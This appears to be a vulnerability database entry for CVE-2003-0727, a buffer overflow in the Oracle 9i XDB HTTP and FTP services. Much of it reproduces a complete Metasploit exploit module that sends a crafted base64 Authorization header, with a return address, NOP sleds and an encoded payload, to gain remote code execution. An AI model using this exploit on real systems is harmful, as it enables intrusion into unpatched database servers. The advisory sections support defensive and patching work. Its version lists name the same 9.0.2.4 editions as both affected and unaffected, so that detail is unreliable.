- Vulnerability information (F82937)

Oracle 9i XDB HTTP PASS Overflow (win32) (PacketStormID:F82937)
Posted: 2009-10-30 00:00:00
Author: MC   Site: metasploit.com
Tags: exploit, web, overflow, vulnerability
Systems: linux, windows
CVE-2003-0727

This Metasploit module exploits a stack overflow in the authorization code of the Oracle 9i HTTP XDB service. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
			'Description'    => %q{
				This module exploits a stack overflow in the authorization
				code of the Oracle 9i HTTP XDB service. David Litchfield,
				has illustrated multiple vulnerabilities in the Oracle
				9i XML Database (XDB), during a seminar on "Variations
				in exploit methods between Linux and Windows" presented
				at the Blackhat conference.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2003-0727'],
					['OSVDB', '2449'],
					['BID', '8375'],
					['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Oracle 9.2.0.1 Universal', { 'Ret' => 0x60616d46 } ],
				],
			'DefaultTarget'  => 0,			
			'DisclosureDate' => 'Aug 18 2003'))
			
			register_options( [ Opt::RPORT(8080) ], self.class )

	end

	def check
		connect
		sock.put("GET / HTTP/1.0\r\n\r\n")
		resp = sock.get_once
		disconnect
 
		if (resp =~ /9.2.0.1.0/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit =  rand_text_english(4, payload_badchars) + ":" 
		sploit << rand_text_english(442, payload_badchars) 
		sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V') 
		sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded

		req  = "Authorization: Basic #{Rex::Text.encode_base64(sploit)}\r\n\r\n"  
		
		res  = "GET / HTTP/1.1\r\n" + "Host: #{rhost}:#{rport}\r\n" + req   
	
		print_status("Trying target %s..." % target.name)
		
		sock.put(res)
		
		handler
		disconnect
	end

end
    

- Vulnerability information

22265
Oracle9i XDB FTP Long Username/Password Overflow
Location: Remote / Network Access   Attack type: Input Manipulation
Impact: Loss of Integrity
Exploit: Public, Commercial   Disclosure: Vendor Verified

- Vulnerability description

A remote overflow exists in Oracle9i Database Server. The XML Database (XDB) FTP service fails to perform proper bounds checking, resulting in a stack-based buffer overflow. With a specially crafted request containing an overly long username or password, a remote attacker can cause arbitrary code execution, resulting in a loss of integrity.

- Timeline

2003-08-18 Unknown
2003-07-10 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Oracle has released a patch to address this vulnerability.

- Vulnerability information

Multiple Oracle XDB FTP / HTTP Services Buffer Overflow Vulnerabilities
Class: Boundary Condition Error   Bugtraq ID: 8375
Remote: Yes   Local: Yes
Published: 2003-07-31 12:00:00   Updated: 2009-11-26 07:15:00
Discovery of these vulnerabilities has been credited to David Litchfield (david@ngssoftware.com).

- Affected program versions

Oracle Oracle9i Standard Edition 9.2.0.1
Oracle Oracle9i Personal Edition 9.2.0.1
Oracle Oracle9i Enterprise Edition 9.2.0.1
Oracle Oracle9i Standard Edition 9.0.2.4
Oracle Oracle9i Personal Edition 9.0.2.4
Oracle Oracle9i Enterprise Edition 9.0.2.4

- Unaffected program versions

Oracle Oracle9i Standard Edition 9.0.2.4
Oracle Oracle9i Personal Edition 9.0.2.4
Oracle Oracle9i Enterprise Edition 9.0.2.4

- Discussion

In a paper titled "Variations in exploit methods between Linux and Windows" presented at Blackhat 2003, David Litchfield illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB).

Successful exploits may allow remote attackers to run arbitrary code in the security context of the vulnerable service.

- Exploit

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Working exploits are available in the referenced paper by David Litchfield.

Exploits have also been made available for the Metasploit Framework; the modules are reproduced in the entries above.

- Solution

Oracle has released patches to address these issues. See the referenced advisory (Oracle Security Alert 58) for details on obtaining and applying the patches through the Oracle Metalink site.


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.